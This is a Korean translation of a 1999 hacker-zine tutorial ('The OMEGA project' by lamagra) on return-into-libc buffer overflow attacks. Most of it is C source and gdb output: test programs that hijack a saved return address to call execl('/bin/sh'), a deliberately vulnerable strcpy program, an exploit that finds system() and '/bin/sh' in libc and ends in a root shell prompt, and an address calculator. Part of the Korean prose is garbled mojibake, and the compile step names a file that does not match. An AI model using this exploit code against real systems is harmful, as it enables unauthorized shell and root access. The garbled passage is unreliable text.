The OMEGA project finished +=+-+=+-+=+-+=+-+=+-+=+-+=+-+=+-+= By lamagra ---[ Flashback 이전 글에서 나는 이것을 하는 이유와 약간의 방법에 대해서 설명했습니다. 거기에는 몇가지 어려움이 있었습니다: o system() 이 호출될때 인자를 넘겨주는것 (우리는 쓰레기값을 쉘로 링크하는 프로그램을 사용해서 이것을 해결했습니다.) ---[ Examination of a program flow 프로그램의 흐름을 알아보기 위해 간단한 예제 프로그램을 사용해보겠습니다. <++> omega/example.c void foo(char *bla) { printf("I got passed %p\n",bla); } void main() { foo("fubar"); } <--> 컴파일하고 gdb 를 돌려봅니다. darkstar:~/omega$ gcc example.c -o example darkstar:~/omega$ gdb example GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-slackware-linux"... (gdb) disassemble main Dump of assembler code for function main: 0x8048594
: pushl %ebp 0x8048595 : movl %esp,%ebp 0x8048597 : pushl $0x8049099 0x804859c : call 0x804857c 0x80485a1 : addl $0x4,%esp 0x80485a4 : movl %ebp,%esp 0x80485a6 : popl %ebp 0x80485a7 : ret End of assembler dump. (gdb) x/5bc 0x8049099 0x8049099 <_fini+25>: 102 'f' 117 'u' 98 'b' 97 'a' 114 'r' (gdb) disassemble foo Dump of assembler code for function foo: 0x804857c : pushl %ebp 0x804857d : movl %esp,%ebp 0x804857f : movl 0x8(%ebp),%eax 0x8048582 : pushl %eax 0x8048583 : pushl $0x8049088 0x8048588 : call 0x8048400 0x804858d : addl $0x8,%esp 0x8048590 : movl %ebp,%esp 0x8048592 : popl %ebp 0x8048593 : ret End of assembler dump. (gdb) quit darkstar:~/omega$ 0x8048597 에서 "fubar" 스트링의 주소값이 스택에 push 된다는것을 알 수 있습니다. 그후에 foo 함수가 호출(0x804859c) 됩니다. 그리고 push 된 주소값을 eax 레지스터로 읽어옴으로서 foo() 를 초기화합니다. 0x804857f 을 보면 알 수 있죠. 그 주소값은 0x8(%ebp) 에 위치해 있습니다. ebp 는 현재의 스택 포인터입니다. ---[ Implementation 그럼 이전으로 돌아가서.. 간단한 테스트 프로그램을 만들었습니다. <++> omega/test.c /* * A small test program for project "omega" * Lamagra */ foo(char *bla) { printf("foo: %p\n",bla); printf("foo: %s \n",bla); } main() { char bla[8]; char *shell = "/bin/sh"; long addy = 0x41414141; printf("foo = 0x%x\n",(long)&foo); printf("bla = 0x%x\n",(long)&bla); printf("shell = 0x%x\n",shell); *(long *)&bla[0] = addy; /* buffer */ *(long *)&bla[4] = addy; /* buffer */ *(long *)&bla[8] = addy; /* saved ebp */ *(long *)&bla[12] = &foo; /* saved eip */ *(long *)&bla[16] = addy; /* Junk */ *(long *)&bla[20] = shell; /* address of the arg */ } <--> 코멘트를 보면 그 용도를 확실하게 알수 있습니다. 읽어보세요. 그리고 컴파일하고 실행해 봅니다. darkstar:~/omega$ gcc test.c -otest darkstar:~/omega$ test foo = 0x804857c bla = 0xbffffb08 shell = 0x8049111 foo: 0x8049111 foo: /bin/sh segmentation fault darkstar:~/omega$ foo 함수가 호출되었고 인자(argument) 가 정확하게 들어갔습니다.
±×·¯³ª ½ÇÇàÈÄ¿¡ segmentation fault ¿¡·¯°¡ ¹ß»ýÇÕ´Ï´Ù. µð¹ö±×Çؼ­ ±× ÀÌÀ¯¸¦ ¾Ë¾Æº¾½Ã´Ù. darkstar:~/omega$ gdb test GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-slackware-linux"... (gdb) break *foo Breakpoint 1 at 0x804857c (gdb) run Starting program: /tmp/omega/hello foo = 0x804857c bla = 0xbffffb10 shell = 0x8049111 Breakpoint 1, 0x804857c in foo () (gdb) x/10wx 0xbffffb10 0xbffffb10: 0x41414141 0x41414141 0x41414141 0x0804857c 0xbffffb20: 0x41414141 0x08049111 0xbffffb44 0x00000000 0xbffffb30: 0x00000000 0x00000000 (gdb) c Continuing. foo: 0x8049111 foo: /bin/sh Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info reg ebp ebp 0x41414141 0x41414141 (gdb) info reg esp esp 0xbffffb24 0xbffffb24 (gdb) quit The program is running. Exit anyway? (y or n) y darkstar:~/omega$ ¸ÛûÇÑ ¹öÆÛ "bla" ´Â ¿ì¸®ÀÇ Àǵµ¸¦ ¸í¹éÇÏ°Ô º¸¿©ÁÝ´Ï´Ù. ÇÁ·Î±×·¥ÀÌ 0xbffffb20 ¹øÁö¸¦ º¸¼¼¿ä. 0x41414141 ¹øÁö¸¦ ½ÇÇàÇÏ·Á°í ½ÃµµÇ߱⶧¹®¿¡ segfault °¡ ¹ß»ýÇÑ°Ì´Ï´Ù. foo() °¡ º¹±Í(¸®ÅÏ)ÇÒ¶§ ½ºÅÿ¡¼­(esp °¡ °¡¸®Å°´Â ºÎºÐ) ebp ¿Í eip °¡ pop µË´Ï´Ù. segfault °¡ ³ªÁö ¾Êµµ·Ï ÇÏ·Á¸é ±×°÷¿¡ ´Ù¸¥ ÁÖ¼Ò°ª(exit() ¶óµçÁö..)À» ³ÖÀ¸¸é µÇ°ÚÁÒ. ±×·¯¸é ±ò²ûÇÏ°Ô Á¾·á°¡ µÉ°Ì´Ï´Ù. ÀÌ ÆÐÄ¡¸¦ Àû¿ëÇؼ­ ÇØ°áÇսô٠(patch test.c test.patch) <++> omega/test.patch --- old.c Wed Oct 6 18:49:07 1999 +++ test.c Wed Oct 6 18:49:25 1999 
@@ -19,6 +19,6 @@ *(long *)&bla[4] = addr; /* buffer */ *(long *)&bla[8] = addr; /* saved ebp */ *(long *)&bla[12] = &foo; /* saved eip */ - *(long *)&bla[16] = addr; /* Junk */ + *(long *)&bla[16] = &exit; /* exit() */ *(long *)&bla[20] = shell; /* address of the arg */ } <--> ÀÎÀÚ(argument) ¸¦ ¿©·¯°³ »ç¿ëÇؼ­Çصµ µÇ°ÚÁÒ. 0x8(%ebp) = arg[1] 0xc(%ebp) = arg[2] 0x10(%ebp) = arg[3] µîµî.. <++> omega/multiple.c #include #include main() { char bla[8]; char *shell = "/bin/sh"; long addr = 0x41414141; printf("bla = 0x%x\n",(long)&bla); printf("shell = 0x%x\n",shell); *(long *)&bla[0] = addr; /* buffer */ *(long *)&bla[4] = addr; /* buffer */ *(long *)&bla[8] = addr; /* saved ebp */ *(long *)&bla[12] = &execl; /* saved eip */ *(long *)&bla[16] = &exit; /* exit() */ *(long *)&bla[20] = shell; /* arg[1] */ *(long *)&bla[24] = shell; /* arg[2] */ *(long *)&bla[28] = 0x0; /* arg[3] */ /* * Executes execl("/bin/sh","/bin/sh",0x0); * On error exit("/bin/sh"); i know weird */ */ } <--> ÀÚ ÀÌÁ¦ secure ÇÑ È¯°æ¿¡¼­ ¹öÆÛ¿À¹öÇ÷οì exploit ¸¦ ÇÒ ¼ö ÀÖ½À´Ï´Ù. ÈïºÐ µÅÁ®? <++> omega/hole.c /* * The hole program. * Prints the address of system() in libc and overflows. */ #include #include main(int argc, char **argv) { char buf[8]; long addr; void *handle; handle = dlopen(NULL,RTLD_LAZY); addr = (long)dlsym(handle,"system"); printf("System() is at 0x%x\n",addr); if(argc > 1) strcpy(buf, argv[1]); } <--> <++> omega/exploit.c /* * The exploit * Finds the address of system() in libc. * Searches for "/bin/sh" in the neighbourhood of system(). 
* (System() uses that string) * Lamagra */ #include #include main(int argc, char **argv) { int x,size; char *buf; long addr,shell,exitaddy; void *handle; if(argc != 3){ printf("Usage %s \n",argv[0]); exit(-1); } size = atoi(argv[1])+16; if((buf = malloc(size)) == NULL){ perror("can't allocate memory"); exit(-1); } handle = dlopen(NULL,RTLD_LAZY); addr = (long)dlsym(handle,"system"); printf("System() is at 0x%x\n",addr); if(!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || !(addr & 0xff000000)) { printf("system() contains a '0', sorry!"); exit(-1); } shell = addr; while(memcmp((void*)shell,"/bin/sh",8)) shell++; printf("\"/bin/sh\" is at 0x%x\n",shell); printf("print %s\n",shell); memset(buf,0x41,size); *(long *)&buf[size-16] = 0xbffffbbc; *(long *)&buf[size-12] = addr; *(long *)&buf[size-4] = shell; puts("Executing"); execl(argv[2],argv[2],buf,0x0); } <--> darkstar:~/omega$ gcc hole.c -ohole -ldl darkstar:~/omega$ gcc omega.c -oomega -ldl darkstar:~/omega$ omega 8 vun System() is at 0x40043a18 "/bin/sh" is at 0x40089d26 print /bin/sh Executing System() is at 0x40043a18 bash# 제대로 동작하는것 같네요. 그러나 이방법을 위해서는 필요한 라이브러리가 링크되어 있어야만 합니다. 프로그램이 동작하지 않는다면 라이브러리가 링크되어있지 않기 때문입니다. system() 의 주소가 다르기 때문이죠. - 정확한 주소를 찾는 다른 방법들입니다. o 주소를 출력하도록 프로그램을 변경한다. (아마도 같을 겁니다.) o ELF-header 로부터 주소를 얻는다. (손상된 파일에서는 제대로 되지 않으리라고 생각합니다. 해결책은 재컴파일) o atexit() (항상 가능) 의 주소를 얻어서 system() 의 주소를 계산한다.
---[ Extra <++> omega/calc.c #include #include main(int argc, char **argv) { long addy,diff; if (argc != 2) { printf("Usage: %s \n",argv[0]); printf("Get the address with GDB\n\t$ echo x atexit|gdb program\n"); exit(-1); } addy = strtoul(argv[1],0,0); printf("Input = 0x%x\n",addy); diff = (long)&atexit - (long)&system; printf("system() = 0x%x\n",addy - diff + 16); } <--> ---[ Reference corezine #2 (http://bounce.to/unah16) 에 있는 나의 이전글 ---[EOF --------------------------------------------------------------------- - 예제 중심의 글이라 번역이라고 하기도 그러네요. 이해가 안되는 부분은 언제나 처럼 원문을 참고~ 고칠부분이 있으면 멜주세요. 아래에 원문을 첨부합니다. - a0 --+ ---------------------------------------------------------------------